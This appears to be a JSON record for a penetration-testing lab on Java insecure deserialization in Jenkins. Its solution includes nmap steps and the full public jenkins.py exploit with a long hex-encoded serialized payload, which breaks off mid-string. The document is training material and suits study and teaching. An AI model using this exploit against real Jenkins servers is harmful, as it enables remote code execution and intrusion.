{
    "id": "f3e25b41-10bd-4694-a0c7-10048b91f004",
    "name": "Java Insecure Deserialization - Scenario 2",
    "slug": "java-insecure-deserialization-scenario-2",
    "status": "published",
    "lab_type": "pta",
    "is_sample": false,
    "duration_in_seconds": 1800,
    "metadata": {
        "courses": [
            "e68327e2-fb00-46b3-bbe3-f85fcb779c1f",
            "630a470a-1ccf-44eb-8111-8947846b5d78"
        ],
        "pta_sdn": "202",
        "collections": [],
        "pta_namespace": "my.ine",
        "learning_paths": [],
        "has_published_parent": true
    },
    "session": null,
    "company": "a491bc32-c056-4946-9169-cc053387bada",
    "created": "2022-06-16T20:23:34.003950Z",
    "modified": "2024-12-31T15:48:59.278279Z",
    "is_beta": false,
    "lab_objectives": [],
    "main_learning_area": "3e1aa06f-2e9f-4789-b50d-aa027ad8dcfa",
    "learning_areas": [
        {
            "id": "3e1aa06f-2e9f-4789-b50d-aa027ad8dcfa",
            "name": "Cyber Security",
            "slug": "cyber-security"
        }
    ],
    "categories": [],
    "tags": [],
    "difficulty": null,
    "is_web_access": false,
    "is_lab_experience": false,
    "is_featured": false,
    "cve": null,
    "severity": null,
    "year": null,
    "classification": null,
    "is_trackable": false,
    "cpe_credits": null,
    "is_skill_check": false,
    "external_url": "",
    "solution_video": null,
    "explanation_video": null,
    "description": "# Java Insecure Deserialization II\n\n# Scenario\n\nYour goal is to exploit a vulnerable to insecure deserialization Jenkins application. Before you start, you might want to read [this](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/) article which includes details regarding the discovery of that vulnerability.\n\n**Target URL:**\n```\nhttp://demo.ine.local\n```\nJenkins application is served in this URL in the target machine. Use this URL to find and exploit the vulnerability.",
    "description_html": "<h1>Java Insecure Deserialization II</h1>\n<h1>Scenario</h1>\n<p>Your goal is to exploit a vulnerable to insecure deserialization Jenkins application. Before you start, you might want to read <a href=\"https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\">this</a> article which includes details regarding the discovery of that vulnerability.</p>\n<p><strong>Target URL:</strong>\n<pre class=\"codehilite\"><code>http://demo.ine.local</code></pre>\nJenkins application is served in this URL in the target machine. Use this URL to find and exploit the vulnerability.</p>",
    "tasks": "# Goals\n\nPerform deserialization attack on Jenkins application to achieve remote code execution.\n\n\n# Recommended tools\n\n-   Ysoserial\n\n-   Python\n\n-   <https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py>\n\n-   Nmap",
    "tasks_html": "<h1>Goals</h1>\n<p>Perform deserialization attack on Jenkins application to achieve remote code execution.</p>\n<h1>Recommended tools</h1>\n<ul>\n<li>\n<p>Ysoserial</p>\n</li>\n<li>\n<p>Python</p>\n</li>\n<li>\n<p><a href=\"https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py\">https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py</a></p>\n</li>\n<li>\n<p>Nmap</p>\n</li>\n</ul>",
    "published_date": "2020-10-20T15:32:24Z",
    "solutions": "# Solution\n\n\n**Step 1:** Start the lab. Wait until the lab is ready. Once the lab is ready, the kali Linux interface will be available on the browser.\n\n![0](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/0.png)\n\n\n**Step 2:** Scan the network with Nmap and gather the information about the target machine.\n\nUse the following command to get the information about open ports and services in the network.\n\n**Command:**\n```\nnmap demo.ine.local\n```\n![1](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/1.png)\n\nGot the information about the IP address and the ports which are open in the target machine.\n\n**Step 3:** Inspect the Jenkins application by navigating to the IP address at port 8080 in the web browser.\n\n**Target URL:**\n```\nhttp://192.24.161.3:8080/\n```\n\n![2](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/2.png)\n\n**Step 4:** Copy and paste the python exploit code and save it as exploit.py.\n\n**Source:** <https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py>\n\n**Code:**\n```py\n#!/usr/bin/python\n#usage: ./jenkins.py host port /path/to/payload\nimport socket\nimport sys\nimport requests\nimport base64\nhost = sys.argv[1]\nport = sys.argv[2]\n#Query Jenkins over HTTP to find what port the CLI listener is on\nr = requests.get('http://'+host+':'+port)\ncli_port = int(r.headers['X-Jenkins-CLI-Port'])\n#Open a socket to the CLI port\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = (host, cli_port)\nprint 'connecting to %s port %s' % server_address\nsock.connect(server_address)\n# Send headers\nheaders='\\x00\\x14\\x50\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x3a\\x43\\x4c\\x49\\x2d\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74'\nprint 'sending \"%s\"' % headers\nsock.send(headers)\ndata = sock.recv(1024)\nprint >>sys.stderr, 'received \"%s\"' % data\ndata = sock.recv(1024)\nprint >>sys.stderr, 'received \"%s\"' % data\npayloadObj = open(sys.argv[3],'rb').read()\npayload_b64 = base64.b64encode(payloadObj)\npayload='\\x3c\\x3d\\x3d\\x3d\\x5b\\x4a\\x45\\x4e\\x4b\\x49\\x4e\\x53\\x20\\x52\\x45\\x4d\\x4f\\x54\\x49\\x4e\\x47\\x20\\x43\\x41\\x50\\x41\\x43\\x49\\x54\\x59\\x5d\\x3d\\x3d\\x3d\\x3e'+payload_b64+'\\x00\\x00\\x00\\x00\\x11\\x2d\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x4c\\x00\\x10\\x63\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x74\\x00\\x30\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x3b\\x5b\\x00\\x07\\x72\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x08\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x03\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x0c\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x3c\\x74\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x10\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x04\\x63\\x61\\x6c\\x6c\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x3c\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x70\\x73\\x7d\\x00\\x00\\x00\\x02\\x00\\x2e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x00\\x1c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x49\\x52\\x65\\x61\\x64\\x52\\x65\\x73\\x6f\\x6c\\x76\\x65\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x03\\x00\\x05\\x5a\\x00\\x14\\x61\\x75\\x74\\x6f\\x55\\x6e\\x65\\x78\\x70\\x6f\\x72\\x74\\x42\\x79\\x43\\x61\\x6c\\x6c\\x65\\x72\\x5a\\x00\\x09\\x67\\x6f\\x69\\x6e\\x67\\x48\\x6f\\x6d\\x65\\x49\\x00\\x03\\x6f\\x69\\x64\\x5a\\x00\\x09\\x75\\x73\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x4c\\x00\\x06\\x6f\\x72\\x69\\x67\\x69\\x6e\\x71\\x00\\x7e\\x00\\x0d\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x73\\x71\\x00\\x7e\\x00\\x0b\\x71\\x00\\x7e\\x00\\x43\\x74\\x00\\x78\\x50\\x72\\x6f\\x78\\x79\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x40\\x32\\x20\\x77\\x61\\x73\\x20\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x20\\x66\\x6f\\x72\\x20\\x69\\x6e\\x74\\x65\\x72\\x66\\x61\\x63\\x65\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x75\\x71\\x00\\x7e\\x00\\x11\\x00\\x00\\x00\\x0d\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x7d\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x89\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x74\\x00\\x04\\x77\\x72\\x61\\x70\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x6a\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x06\\x65\\x78\\x70\\x6f\\x72\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\xa6\\x74\\x00\\x21\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x74\\x00\\x16\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x4a\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x46\\x71\\x00\\x7e\\x00\\x1d\\x71\\x00\\x7e\\x00\\x1e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x22\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x26\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x71\\x00\\x7e\\x00\\x28\\x70\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x2b\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x71\\x00\\x7e\\x00\\x30\\x71\\x00\\x7e\\x00\\x31\\x71\\x00\\x7e\\x00\\x32\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x34\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x36\\x71\\x00\\x7e\\x00\\x3a\\x78\\x78\\x75\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x07\\x46\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x04\\x49\\x00\\x03\\x6f\\x69\\x64\\x5b\\x00\\x09\\x61\\x72\\x67\\x75\\x6d\\x65\\x6e\\x74\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x05\\x74\\x79\\x70\\x65\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x77\\x08\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x02\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\x00\\